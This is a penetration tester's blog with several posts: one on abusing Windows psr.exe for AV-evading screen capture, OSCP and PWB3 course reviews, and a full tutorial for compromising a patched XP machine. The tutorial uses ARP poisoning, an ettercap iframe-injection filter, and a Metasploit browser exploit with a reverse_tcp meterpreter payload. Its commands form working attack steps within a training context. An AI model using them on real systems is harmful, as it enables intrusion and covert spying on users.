M$ Screencap Application For Troubleshooting… And Sleuthy Spying

I was recently made aware by an infosec colleague of mine DMFH (aka Donny Harris) about an M$ utility called the Problem Step Recorder, aka psr.exe.  It comes standard on Windows 7 machines.  In a nutshell it’s used to provide a step-by-step breakdown of user activity to provide to tech support after a user has re-created a problem, complete with screen captures!  NOTE: it does NOT capture keystrokes.  So, thankfully M$ did not embed a keylogger into Windows 7.  It shows a script of sorts of user’s activity in windows, info about PIDs, what mouse buttons are clicked and different hooks and internal system calls.  What got me was the screen captures… I know there are metasploit modules (screenspy and screenshot) and AutoIT apps, and that every keylogger on earth has a screencap ability.  DMFH made a good point tho: psr.exe would not be caught by most AV’s being that it is a signed and trusted system utility.  And, if a user sees psr.exe in their taskmgr and google it, they’ll see its an M$ troubleshooting tool, so they may be less concerned with it.

I realize that if you’re on a box and can run psr.exe you’ve already owned it, or are close to doing so; this is not the next l33t h@x0r attack, but another tool in your arsenal.  One use case could be you have shell access to machine (no meterpreter) and you can’t figure out a way to get tools onto the box for some reason.  If it’s a Windows 7 (didn’t find it on server 2k8 r2) you can grab screencaps and save them somewhere you can hopefully access.  Also, to reiterate my point, it’s an M$ utility so you don’t have to bring in another app that could trigger AV.

Below are a few pictures showing what the web archive (.mht) file contained.

Here are the commands to run psr.exe from the cli.  I did try it from a shell gained via metasploit and it worked like  a champ.  The key is migrate (if you’re not already running as them) into a PID of a user to capture that users’ session.

 psr.exe /start /output c:Usersusernametest.zip /sc 1 /gui 0

You need to issue (or schedule task) the below command to stop psr.exe from runningrecording.

psr.exe /stop

Here’s a blog post I found that details some of the switches of psr.exe.

Passed the Offensive Security OSCP Exam!

It has been an intense journey since I signed up for the PWBv3 course from Offsec.  But, now it is all worth it.  I received notice that I passed and can now claim the title: Offensive Security Certified Professional (OSCP).  I have taken many security courses, and have gotten a few certifications along the way, and I must say none have been as rewarding as this.  I cannot sing the praises of Offsec enough, even though sometimes during the course I wanted to curse their diabolical minds for coming up with some of the machines I had to penetrate.  I will admit that this was my second attempt at the OSCP exam.  I will not say I failed the first attempt (well actually that’s exactly what I did) but rather learned valuable lessons from it.  My first attempt was 23 hours straight (I took an hour nap) and at the end I knew I had come up short even before they emailed me.  But, this did not discourage me, it energized me!  I talked to many folks who had had a similar experience.  I will say that I hold this certification higher than any I have attained yet, bar none.

To those who are taking the course and may come across this post: Do not fret!  Remember what you’ve learned, and if you get knocked down get up and go at it again!  For those of you who are not (or have not) taken the course, check it out!  I guarantee even if you’ve been pen-testing for years this course will be a heckuva time!

Offensive Security Penetration Testing With Backtrack (PWB3)

In my never ending quest for IT security excellence I’ve decided to enroll in the Offensive Security Penetration Testing With Backtrack version 3 (PWB3) course, offered by Offensive-Security.  The course, formerly known as OSCP 101, has turned out to be quite a different animal than other security coursescertification tracks I have taken in the past.  I opted to take the online version, which fits my learning style (and family life!).  I am one week into the course and already think it’s one of the finest security training events I’ve gotten to be a part of so far.  Before enrolling I did some searching to find reviews and opinions of different course participants, and while I did find several, they were few and far between.  I’ve decided to write about my experiences to date, and to provide updates periodically up until the point I take the final exam.  Speaking of the exam, did I mention it’s a 100% hands on exercise, wherein exam participants must compromise unknown machines to pass it?  I don’t think any type of exam cram method will help folks out on this one!  You either know how to perform a pen test, or you fail, simple as that.

I did some reading and found several great write up from folks who have taken the course, but I wanted to throw my hat in the ring of reviewers as well.  I would definitely read these other posts, to get different points of views on the PWB3 course.  You can find one here

Once enrolled you get vpn access to the offsec lab environment, flash video files for the couse and pdf lab guide, as well as a dedicated XP vm in the lab network.

One of the neatest things I’ve come to discover while taking this course is that the initial modules, which at first glance I was tempted to skip, provided value to me!  I’ve been using backtrack for several years, and while my Linux skills may not equate me to an Uber Linux Ninja I am fairly capable of using the Linux command line and bash scripting.  I forced myself early on not to skip any modules and to watch all of the videos AND read the corresponding sections in the lab guide.  I was pleasantly surprised when shortcuts to the ways I’d been doing things were shown, or different tricks to manipulating text were displayed.  I have thoroughly enjoyed the different lab exercises to this point, and have begun getting into the nitty gritty of buffer overflows and shellcode. 

One area that has particularly fascinated me has been the use of search engines (specifically Google) in penetration testinginformation gathering.  I’ve known about Johny Long’s Google Hacking Database  for several years now, but to see it used in practical examples was excellent.  Using Google to find actual vulnerable web servers was cool (also dangerous), but the simple data gathering techniques shown were very eye opening.  To see, and use, some of the different tricks like using Google search operators to scour the Inter-webs to find juicy bits of data has really been excellent.  I’ve known and used some of these techniques in the past, but some of the operators or search methods were new to me.  In one instance I discovered a PDF document that’s footer read “Data contained within this document is confidential and proprietary”.  Yikes!  I contacted the company that was hosting the data and it disappeared the next day. 

It really is amazing the types of things you can find out about people and organizations without doing any “hacking” per se, but just intuitively searching Google.  I highly suggest folks try searching for their own names or originations and see what comes up, you might be surprised!  

This course takes you through a penetration test, from alpha to zeta, and adds value throughout.  I can’t speak more highly of it… well, scratch that.  If I pass the final exam THEN I’ll not be able to speak higher…  I’ll update you on my progress in a week or so.

Security Testing:Fully Patched Machine Compromise with MITM+Iframe Injection

The purpose of this post to provide an example of how to use the freely available Linux distribution Backtrack when conducting security testing; and to provide a specific example of an attack scenario with detailed instructions on the commands used with a description.

This is by no means an all encompassing tutorial for using Backtrack during securitypenetration testing.  If you do not have a basic understanding of what Backtrack is or how it is used I suggest you read some info about it here: http://www.backtrack-linux.org/about/.  This post is mainly to provide the readers with an overview of a common attack scenario, using what I consider to be the “swiss army knife” of IT security tools.  Hopefully this will inspire people to learn more about the different ways you can perform security tests, and be a catalyst for further research.

Now for the usual disclaimer:

The instructions contained below are provided for informationaleducational purposes only and should only be used on networks that you control, or have permission to utilize.  Unauthorized access to networks or computers is usually frowned upon by the network administrators, home users, and general law abiding citizens that populate this fine blue orb we call home; and while you think you won’t get caught the best bet is to NOT muck around someone else’s network EVEN if it’s an open wifi network with a name like “Linksys” or “Netgear”… had to be said, but I digress.

Most of the techniques described here have been documented separately or similarly on other websitesblog posts.  I will post a list of references at the end for further review, and to give credit where credit is due.

Let’s look at an overview of the attack scenario:

Conditions: Access to the network has already been gained by either wireless cracking, or some other access to a wired network.  The gateway IP, target’s IP and operating system have already been discovered and all three are on the same subnet.  The target is a patched Windows XP machine running SP3 and IE8.  We will use Backtrack 4 final release, and the Metasploit framework version 3 which is already installed on Backtrack.

The attack will begin with a basic MITM (man-in-the-middle) ARP poisoning attack against a single target on a network.

The network traffic, specifically the Web traffic, browsed by the target will be intercepted by our computer and an iframe will be injected into all of the web pages viewed.  This iframe will point back to our attacking computer which will be hosting a web page with a malicious payload (via the Metasploit framework).

When the target browses to most web pages our iframe will execute the malicious content hosted on our computer in their browser.  The end result will be admin access to the targets computer, via a meterpreter session.

 Section 1: Prepare Backtrack

 If you are already familiar with Backtrack you can skip this section.  This is simply the steps required for preparing Backtrack after initial live boot.

Open a terminal session and type /usr/bin/start-network  This command enables the networking on Backtrack.

Now we need to update Metasploit.  In a terminal type cd /pentest/exploit/framework3

 

This brings us to the Metasploit directory.  Type in svn update.  At the prompt type y.

This will update the Metasploit framework with the latest modules. 

Now we need to enable IP forwarding using iptables

echo 1 > /proc/sys/net/ipv4/ip_forward

Lastly we’ll ensure ip forwarding is enabled in ettercap

We need to edit the etter.conf file.  However you choose to do that is up to you, I use VI.  A VI tutorial is beyond the scope of this post.  I suggest you check out the security researchers’ best friend: Google if you need help with VI.  Type Kate from a terminal for a GUI text editor or choose it from the Utilities menu. 

The file can usually be found here: /etc/etter.conf if you’re using Backtrack4 Final Release.

We need to make 3 changes in etter.conf:

ec-uid = 0

ec_guid = 0

uncomment the redir_command_on and redir_command_off sections below the “if you use iptables” section of etter.conf

  Section 2: Prepare Ettercap filter

 Ettercap is a network sniffer that can not only log packet data but can use filters to inject or replace data within the packets.  When used in a MITM attack ettercap filters can drop packets, or inject code into packets that will be forwarded to the target machine. 

Enter this data into a text file using your favorite text editor and save it as iframe.txt:

if (ip.proto == TCP && tcp.dst == 80) {

   if (search(DATA.data, "Accept-Encoding")) {

      replace("Accept-Encoding", "Accept-Rubbish!");

                  # note: replacement string is same length as original string

      msg("zapped Accept-Encoding!n");

   }

}

if (ip.proto == TCP && tcp.src == 80) {

   replace("</title>", "</title><a href="http://youripaddress">http://youripaddress</a>");

   msg("iframe Filter Ran.n");

}

The above filter will put our iframe right after the closing title tag in most web sites. 

Now from a terminal, and in the same directory where you saved iframe.txt, enter

 ettefilter iframe.txt –o iframe.ef

.

This command compiles the iframe.txt file into the actual etterrcap filter, or “ef” file.

A success message would look like this: Script encoded into 15 instructions.

Section 3: Launch Metasploit

 From the /pentest/exploit/framework3 directory launch the Metasploit console with this command: msfconsole

 You can choose your favorite browser exploit, I’m going to use: windows/browser/ms10_xxx_helpctr_xss_cmd_exec

Metasploit commands:

 
Use windows/browser/ms10_xxx_helpctr_xss_cmd_exec
Set PAYLOAD windows/meterpreter/reverse_tcp
Set LHOST youripaddress
Set SRVHOST youripaddress
Set SRVPORT 80
Exploit

Section 4: Launch Ettercap for MITM attack

 

Now that all of the different prereqs for the attack have been prepared we can launch ettercap

Enter the following command into a terminal window (replace underlined items with the correct name or ip in your environment):

ettercap –i wlan0 -F iframe.ef –TQM arp:remote targetip gatewayip -P autoadd 

The –i witch specifies interface, you only need it if you have multiple interfaces.  If you have only one you can omit. –F is specifying the filter to use.  T= text mode, Q=quiet M=MITM attack. 

You may see only one of the addresses, commonly the gateway, is added to an ettercap group.  This is not uncommon with wireless clients.  Both the gateway and target need to show up in one of the groups.  You can either wait until your target sends an arp request or you can force it to by pinging a non existent IP on your subnet from the target.  The choice is yours.  The point is that if you press the L key while in ettercap you should see both your target ip and the gateway there for the MITM to be a success.

Once ettercap is running open up IE on your target and browse somewhere, I used test.com.  You should see the “iframe filter run” message on your Backtrack box.

You should also see the exploit initiate on the Metasploit terminal.  On your victim box a message will pop up.  If you click allow button the exploit will run.

You should then see a meterpreter session initiated on your Backtrack computer (sometimes this take a bit, so be patient).

If you see a message on your Backtrack machine that says a meterpreter session has been created you can hit CTRL+C then type sessions –i 1 (that’s a number 1) to interact with the meterpreter session, assuming the session number is 1.

You’ve compromised the box!  You can now do things like drop to a command shell on the target by entering shell into meterpreter.  Or, if you want to be surreptitious you could enter

execute –F cmd.exe –i –H –c

.  there are many things you can do with a successful meterpreter session setup.  You can uploaddownload files, grab password hashes, send over a back door program like netcat, edit the registry… really whatever you want to do.

I hope you’ve found this post helpful, and will use it as fodder for more research into the kinds of things you can do with Backtrack and metasploit, and IT security in general.

Good hunting!

References

 

http://www.irongeek.com/i.php?page=security/ettercapfilter

http://www.backtrack-linux.org/

http://hi.baidu.com/artcracker/blog/item/86209ed411e1cac850da4b15.html

http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/topic,5078.msg25656/topicseen,1/

http://www.irongeek.com/i.php?page=videos/deploying-metasploits-meterpreter-with-mitm-and-an-ettercap-filter

http://forum.intern0t.net/offensive-guides-information/603-arp-poisoning-mitm-attack.html